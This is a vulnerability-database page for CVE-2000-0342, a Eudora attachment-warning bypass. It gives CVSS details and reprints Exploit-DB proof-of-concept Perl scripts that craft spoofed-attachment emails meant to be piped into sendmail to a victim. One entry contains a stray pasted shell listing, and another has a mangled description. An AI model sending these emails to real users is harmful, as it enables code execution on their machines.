CVE-2000-0342 : Detail

CVE-2000-0342

7.5
/
HIGH
A01-Broken Access Control
1.22%V3
Network
2000-07-12 02:00 +00:00
2005-11-02 09:00 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

Eudora 4.x allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka "Stealth Attachment."

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-59 Improper Link Resolution Before File Access ('Link Following')
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

Metrics

Metric Score Severity CVSS Vector Source
V3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

None

There is no loss of confidentiality within the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

None

There is no impact to availability within the impacted component.

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

nvd@nist.gov
V2 5 AV:N/AC:L/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19885

Publication date : 2000-04-27 22:00 +00:00
Author : Bennett Haselton
EDB Verified : Yes

source: https://www.securityfocus.com/bid/1157/info A malicious email sender can circumvent warning messages that would normally display when a user attempts to view executable attachments in Eudora 4.2/4.3. Eudora does not prompt a user with the warning message if they are attempting to open a file that is neither .exe, .com, or .bat. Inserting the tag http ://www.example.com in an email message will display as: http ://www.example.com in a Eudora email client. Therefore, when a user clicks on this link, it will automatically open up the executable file without warning.
Exploit Database EDB-ID : 22627

Publication date : 2003-05-21 22:00 +00:00
Author : Paul Szabo
EDB Verified : Yes

source: https://www.securityfocus.com/bid/7653/info Eudora is reported to be prone to an issue which may allow attackers to spoof the file extension in an attachment. This may aid an attacker in enticing a user of the e-mail client into executing malicious content. It is possible to refer to other files or attachments in a message through specially formatted inline text. If the CR (carriage return) character (0x0D, Ctrl-M) is embedded anywhere in the 'Attachment Converted' string, it is possible to execute message attachments without further user interaction. #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0 on Windows exploit\n"; print "MIME-Version: 1.0\n"; print "Content-Type: multipart/mixed; boundary=\"zzz\"\n"; print "\n"; print "This is a multi-part message in MIME format.\n"; print "--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print "\nQuestion: Besides In.mbx, Eudora 6.0 also keeps In.mbx.001 and In.mbx.002 files. Any way to turn this wasteful feature off?\n"; print "\nWith spoofed attachments, we could 'steal' files if the message was forwarded (not replied to).\n"; print "\nSending a long filename e.g.:\n"; print "Attachment Converted\r: \"\\AAA...AAA\"\n"; print "(with 250 or so repetitions of \"A\") makes Eudora crash. Eudora is then unable to start, until the offending message is removed from In.mbx (using some utility other than Eudora itself). This buffer overflow can easily be made into an execute-any-code exploit (but is not shown here for script kiddies).\n"; print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded CR=x0d characters get converted internally into a NUL=x00 and ignored, so we can spoof \"attachment converted\" lines:\n"; print "\nThe following work fine (but are boring and/or put up warnings):\n"; print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n"; print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n"; print "(Note how JavaScript is done with IE, web with default browser Netscape)\n"; print "Attachment Converted\r: hello.txt\n"; print "Attachment Converted\r: web.txt\n"; print "Attachment Converted\r: file.txt\n"; print "\nIf we can guess the full path to the attach directory then can change the name shown to anything we like, but get broken icon:\n"; print "Attachment Converted\r: file.txt\n"; print "\nCuteness value only:\n"; print "Attachment Converted\r: file1.txt xyz file2.txt\n"; print "\n With HTML inclusions we can do file, http and javascript references. Any way to exploit this? \n"; print "\n Can also do RTF inclusions. Can this be abused? \n"; print "\nThose constructs allow spoofing attachments easily, without embedded CR:\n\n"; print "HTML\n"; print "Attachment Converted: \"xyz\"\n"; print "Rich\n"; print "Attachment Converted: \"xyz\"\n"; print "Flowed\n"; print "Attachment Converted: \"xyz\"\n"; print "\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"plain.txt\"\n"; print "Content-Transfer-Encoding: 7bit\n"; print "Content-Disposition: inline; filename=\"plain.txt\"\n"; print "\n"; print "Within a 'plain' attachment:\n"; print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"qp.txt\"\n"; print "Content-Transfer-Encoding: quoted-printable \n"; print "Content-Disposition: inline; filename=\"qp.txt\"\n"; print "\n"; print "Within quoted-printable encoded parts still need the embedded CR:\n"; print "=41ttachment=20=43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"b64.txt\"\n"; print "Content-Transfer-Encoding: base64\n"; print "Content-Disposition: inline; filename=\"b64.txt\"\n"; print "\n"; $z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r without embedded CR (but line termination is CR-NL):\r Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n"; print encode_base64($z); print "\n--zzz--\n"; print "\n";
Exploit Database EDB-ID : 23398

Publication date : 2003-11-24 23:00 +00:00
Author : Paul Szabo
EDB Verified : Yes

source: https://www.securityfocus.com/bid/9101/info A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions. ** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well. #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print " Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach directory only, and allows spoofed attachments pointing to an executable stored elsewhere to run without warning:\n"; print "Attachment Converted\r: go.txt\n"; print "Attachment Converted\r: c:/winnt/system32/calc\n"; $X = 'README'; $Y = "$X.bat"; print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; flynn@mail:~$ ls 814BlackoutReport.pdf administrivia code flying leth.txt mergemail.pl sfmutt.tgz syngress Maildir backfill.txt docs flynn mail pics src ware admin check eudora-launchprotex.pl igss.txt malcode.txt scripts survey flynn@mail:~$ cat eudora-launchprotex.pl #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print " Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach directory only, and allows spoofed attachments pointing to an executable stored elsewhere to run without warning:\n"; print "Attachment Converted\r: go.txt\n"; print "Attachment Converted\r: c:/winnt/system32/calc\n"; $X = 'README'; $Y = "$X.bat"; print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; print "begin 600 $X\n", pack('u',$z), "`\nend\n"; print "\nand (in another message or) after some blurb so is scrolled off in another screenful, also send $Y. Clicking on $X does not get it any more (but gets $Y, with a LauchProtect warning):\n"; $z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n"; print "begin 600 $Y\n", pack('u',$z), "`\nend\n"; print " Can be exploited if there is more than one way into attach: in my setup H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n"; print "These elicit warnings:\n"; print "Attachment Converted\r: readme\n"; print "Attachment Converted\r: h:/eudora/attach/README\n"; print "while these do the bad thing without warning:\n"; print "Attachment Converted\r: readme\n"; print "Attachment Converted\r: //rome/home/eudora/attach/README\n"; print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n"; print " For the default setup, Eudora knows that C:\\Program Files and C:\\Progra~1 are the same thing...\n"; print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n"; print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n"; print "\n";
Exploit Database EDB-ID : 23399

Publication date : 2003-11-24 23:00 +00:00
Author : Paul Szabo
EDB Verified : Yes

source: https://www.securityfocus.com/bid/9101/info A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions. ** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well. #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtect\n"; print "MIME-Version: 1.0\n"; print "Content-Type: multipart/mixed; boundary=\"zzz\"\n"; print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n"; print "This is a multi-part message in MIME format.\n"; print "--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; print "With spoofed attachments, we could 'steal' files if the message was forwarded (not replied to).\n"; #print " #(Within plain-text email (or plain-text, inline MIME parts) embedded #CR=x0d characters used to get converted internally into a NUL=x00 and #ignored, so we could spoof \"attachment converted\" lines. #At version 6.1.1, embedded CR seem to get converted into NL=x0a.)\n"; print "\nThe constructs (x-html, x-rich or x-flowed) allow spoofing attachments easily. The following work fine (but put up warnings):\n"; print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n"; print "Attachment Converted: c:\\winnt\\system32\\calc.exe\n"; print "Attachment Converted: file.exe\n"; print "These have broken icons, but execute without warning:\n"; print "Attachment Converted: \"c:\\winnt\\system32\\calc\"\n"; print "Attachment Converted: c:\\winnt\\system32\\calc\n"; print "Attachment Converted: file\n"; print "\n With HTML inclusions we can do file.exe (get warning)
and plain file (no warning) references.
(Or can do http and javascript references; the latter
seems to run with IE, regardless of default browser settings.).
\n"; print "\n\n Can also do RTF inclusions. Can that be abused? \n\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"b64.txt\"\n"; print "Content-Transfer-Encoding: base64\n"; print "Content-Disposition: inline; filename=\"b64.txt\"\n"; print "\n"; $z = "Can no longer spoof attachments in quoted-printable parts, but\r still can within base64 encoded (plain-text, inline) MIME parts:\r Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r Attachment Converted: \"c:\\winnt\\system32\\calc\"\r\n"; print encode_base64($z); print "\n--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; $X = 'README'; $Y = "$X.bat"; print "\n\n\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; print "begin 600 $X\n", pack('u',$z), "`\nend\n"; print "\nand (in another message or after some blurb so is scrolled off in another screenful) also send $Y. Clicking on $X does not get it any more, but gets $Y and runs without any warning:\n"; $z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n"; print "begin 600 $Y\n", pack('u',$z), "`\nend\n"; #print "\nIf we can guess the full path to the attach directory then can #change the name shown to anything we like, but get broken icon:\n"; #print "Attachment Converted: attach\\README\n"; #print "Attachment Converted: file.txt\n"; #print "\nFunny: I thought that since version 6.0, LaunchProtect handled #the X-X.exe dichotomy (in the attach directory only)...\n"; print "\n"; print "\n--zzz--\n"; print "\n";

Products Mentioned

Configuraton 0

Qualcomm>>Eudora >> Version 4.0

References

http://www.securityfocus.com/bid/1157
Tags : vdb-entry, x_refsource_BID
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.